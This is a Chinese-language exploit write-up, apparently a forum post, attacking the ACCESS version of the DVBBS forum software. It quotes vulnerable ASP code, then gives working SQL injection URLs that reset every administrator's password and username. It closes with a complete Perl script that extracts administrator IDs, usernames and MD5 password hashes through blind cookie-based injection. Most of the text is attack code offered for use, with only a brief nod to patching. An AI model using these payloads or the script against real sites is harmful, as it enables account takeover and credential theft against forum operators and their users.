>>>Dedicated This Scrap To CaoJing & GuTing<<<

Envymask的睿智幫我解決了很多問(wèn)題，盡管是兄弟，我還是要說(shuō)謝謝。

很吃驚地看到了DVBBS發(fā)布的安全補(bǔ)丁，原來(lái)有人提醒了作者程序所存在的一類(lèi)漏洞。可以看出，作者對(duì)DVBBS做了全面檢測(cè)，并且在消除那一類(lèi)漏洞的同時(shí)，也順帶消除了其他幾個(gè)安全隱患。看到自己曾耗費(fèi)數(shù)小時(shí)換來(lái)的“勞動(dòng)成果”被作者解決，心中有點(diǎn)不快。

有人、文章錯(cuò)誤地認(rèn)為：動(dòng)網(wǎng)即使存在漏洞，也只能真正威脅MSSQL版；而ACCESS版的用戶敏感信息MD5加密和后臺(tái)管理的SESSION+COOKIE驗(yàn)證則讓大家認(rèn)為它牢不可破：“頂多讓你得到MD5加密后的密碼，你還能做什么呢？”、“我們只有暴力破解”、“動(dòng)網(wǎng)已經(jīng)是非常安全的程序了”...在一個(gè)失落的清晨，我偶然發(fā)現(xiàn)了這位親愛(ài)的朋友，她靜靜地站在絕對(duì)的背后，微笑...

因此，本文展示如何攻破“所謂安全”的ACCESS版DVBBS；由于MSSQL版的漏洞利用簡(jiǎn)單乏味，拒絕介紹。另外，請(qǐng)相關(guān)朋友速打補(bǔ)丁。

攻擊分兩步，首先得到管理員MD5加密的敏感信息，接著在此基礎(chǔ)上更改后臺(tái)管理員密碼。

一：得到任意用戶MD5加密的敏感信息
可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞達(dá)到目的。這些漏洞文件中l(wèi)ogout.asp讓我稍感新意，選它來(lái)說(shuō)明問(wèn)題：
logout.asp:
/--------------------------------------------------------------------------
<!--#include file="conn.asp"-->

<!--#include file="inc/const.asp"-->

<%
dim activeuser
membername=request.cookies("aspsky")("username")
if session("userid")<>"" then
activeuser="delete from online where id="&session("userid")
Conn.Execute activeuser
end if
if membername<>"" then
activeuser="delete from online where username='"&membername&"'"
Conn.Execute activeuser
end if
Response.Cookies("aspsky").path=cookiepath
Response.Cookies("aspsky")("username")=""
Response.Cookies("aspsky")("password")=""
Response.Cookies("aspsky")("userclass")=""
Response.Cookies("aspsky")("userid")=""
Response.Cookies("aspsky")("userhidden")=""
Response.Cookies("aspsky")("usercookies")=""
session("userid")=""
conn.close
set conn=nothing
response.redirect("index.asp")
%>
/--------------------------------------------------------------------------
問(wèn)題語(yǔ)句： activeuser="delete from online where username='"&membername&"'"
很多人會(huì)問(wèn)：這也能利用？
能！
步驟：
1：注冊(cè)一用戶并登陸；
2：在COOKIE中構(gòu)造membername請(qǐng)求logout.asp，以圖程序所執(zhí)行的SQL查詢語(yǔ)句中包含我們利用邏輯關(guān)系添加的子語(yǔ)句；
3：構(gòu)造參數(shù)請(qǐng)求主頁(yè)面，如返回頁(yè)面包含用戶注冊(cè)名，重復(fù)第 2 步；
4：得到敏感信息。

測(cè)試程序附后。

二：闖入后臺(tái)管理
我們已經(jīng)得到管理員MD5加密的敏感信息，現(xiàn)在可以利用COOKIE欺騙可以在前臺(tái)執(zhí)行管理員操作。如果你依然堅(jiān)持暴力破解，并認(rèn)為這很有趣，你可以停止閱讀本文了。

鄙視暴力破解。不是說(shuō)不現(xiàn)實(shí)，而是說(shuō)這很乏味。

admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
if topicid="" or isnull(topicid) then
Errmsg=Errmsg+"<li>"+"請(qǐng)選擇相關(guān)帖子后進(jìn)行操作。"
Founderr=true
end if
end if
if request("tablename")="topic" then
tablename="topic"
elseif instr(request("tablename"),"bbs")>0 then
tablename=request("tablename")
else
Errmsg=Errmsg+"<li>"+"錯(cuò)誤的系統(tǒng)參數(shù)！"
Founderr=true
end if
if not master then
Errmsg=Errmsg+"<li>"+"您不是系統(tǒng)管理員或者您還沒(méi)有登陸。"
Founderr=true
end if
...
'還原回收站內(nèi)容
sub redel()
dim tempnum,todaynum
if instr(tablename,"bbs")>0 then
sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
conn.execute(sql)
...
/--------------------------------------------------------------------------
問(wèn)題：
1：未采用SESSION認(rèn)證
2：topicid沒(méi)有過(guò)濾
3：僅要求tablename包含bbs而不采取其他任何過(guò)濾（目前依然未修正）

Tablename和TopicID前后呼應(yīng)，真是天合之作。提交

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs

實(shí)際執(zhí)行的是

update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)

這樣，ID為 9 的后臺(tái)管理員的密碼就被修改為 ilikecat (ef7813118e77b0ee)。

提交如上URL后，頁(yè)面會(huì)返回出錯(cuò)提示。這是因?yàn)楹竺娴腟QL語(yǔ)句有語(yǔ)法錯(cuò)誤，別管它，我們要求執(zhí)行的語(yǔ)句已經(jīng)在它之前“正確”執(zhí)行了。

注意：前臺(tái)管理員和后臺(tái)管理員是一一對(duì)應(yīng)的，弄錯(cuò)了不能正確登陸后臺(tái)。為了省事，你可以：

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs

所有后臺(tái)管理員密碼修改為 ilikecat (ef7813118e77b0ee)

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs

所有后臺(tái)管理員用戶名修改為 catlikeme 

當(dāng)然，最好不要無(wú)聊到把所有注冊(cè)用戶的帳號(hào)和密碼全修改了。

OK，本地COOKIE做些處理后，勞請(qǐng)使用 catlikeme/ilikecat 登陸后臺(tái)進(jìn)行“管理”。

/--------------------[獲取任意用戶MD5加密信息的測(cè)試程序：

#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBS's logout.asp

#-------------------------------------------------------------------------- 
# 本腳本針對(duì)動(dòng)網(wǎng)論壇logout.asp文件缺陷而寫(xiě)，可以推算出所有用戶
# MD5加密密碼；另外可以自動(dòng)破解后臺(tái)管理員ID、username、password
# 腳本參照最新版本編寫(xiě)，若低版本出現(xiàn)不能用的情況，請(qǐng)自行修改程序
# 腳本利用方法：
# 1：在目標(biāo)論壇以 ilikecat/catlikeme 注冊(cè)一用戶，并得到此用戶的 userid
# 2：再另注冊(cè)一任意用戶(此步不可少)
# 3：運(yùn)行腳本，按幫助輸入命令參數(shù)
# 如果是MSSQL版，請(qǐng)把這段糟糕的腳本扔到一邊
#--------------------------------------------------------------------------

$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');

print "\n ===================================================\n";
print " Exploit of DVBBS's logout.asp\n";
print " Codz By PsKey<PsKey\@hotmail.com> \n";
print " www.isgrey.com && c4st.51.net \n";
print " Thanx Envymask<130\@21cn.com> \n";
print " ===================================================\n";

&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));

$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;

if ($opt_m eq "p") {
&usage unless defined($opt_u);
print "\nPlease wait...\n\n";
for ($j=1;$j<=16;$j++) {
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$j.th;
print "\n\/\/------------The $th word of the password is $dic[$i]";
$pws=$pws.$dic[$i];
last;
}
}
}
print "\n\nSuccessful,the full password of $user is $pws.\n";
}

elsif ($opt_m eq "b") { 

#Crack ID
print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>There is one admin's id $i";
push (@id,$i);
&first;
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
sleep(2);

#Crack the length of admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
for ($j=0;$j<@id;$j++) {
print " \|\-\>cracking username's length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>The length of $id[$j] is $i";
push (@len,$i);
&first;
last;
}
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
sleep(2);

#Crack admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking username which id is $id[$j] ...";
OUTER: for ($k=1;$k<=$len[$j];$k++) {
&first;
USERNAME: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
$pws=$pws.$dic[$i];
last USERNAME;
}
if ($dic[$i] eq "z") {
print "\ni can't crack this admin's name,maybe it is chinese.\n";
push (@user,"\?");
last OUTER;
}
}
}
push (@user,$pws);
print "\n========>>The username is $pws which id is $id[$j]\n";
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
sleep(2);

#Crack admin's password
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking password which id is $id[$j] ...";
for ($k=1;$k<=16;$k++) {
&first;
PASSWORD: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
}
print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
print "We got them now:\n";
printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
}
}

else {
&usage;
}

sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
"Referer: http://$host$path/login.asp\n".
"Host: $host\n".
"Content-Length: $len\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
"\n".
"$str\n\n";
print "\n.";
sendraw($req);
$req0 = "GET $path/index.asp HTTP/1.0\n".
"Referer: http://$host$path/index.asp\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".\n";
sendraw($req0);
}

sub second {
$req1 = "GET $path/logout.asp HTTP/1.0\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
print ".";
@res = sendraw($req1);
$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
"Referer: http://$host$path/index.asp?action=show \n".
"Host: $host\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".";
@in = sendraw($req2);
}

sub usage {
print qq~
Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]
-h =hostname you want to attack
-p =port,80 default
-w =the web path such as "/dvbbs"
-i =the userid of ilikecat
-m =only two choice,b<background> and p<proscenium>(This option need -u)
-u =the user you want to crack
Eg: 1.Crack proscenium 
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin 
2.Crack background
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
~;
exit;
}

sub sendraw { 
my ($req) = @_; 
my $target; 
$target = inet_aton($host) || die("inet_aton problems\n"); 
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); 
if(connect(S,pack "SnA4x8",2,$port,$target)){ 
select(S); 
$| = 1; 
print $req; 
my @res = <S>; 
select(STDOUT);
close(S); 
return @res;
}
else { 
die("Can't connect...\n"); 
}
}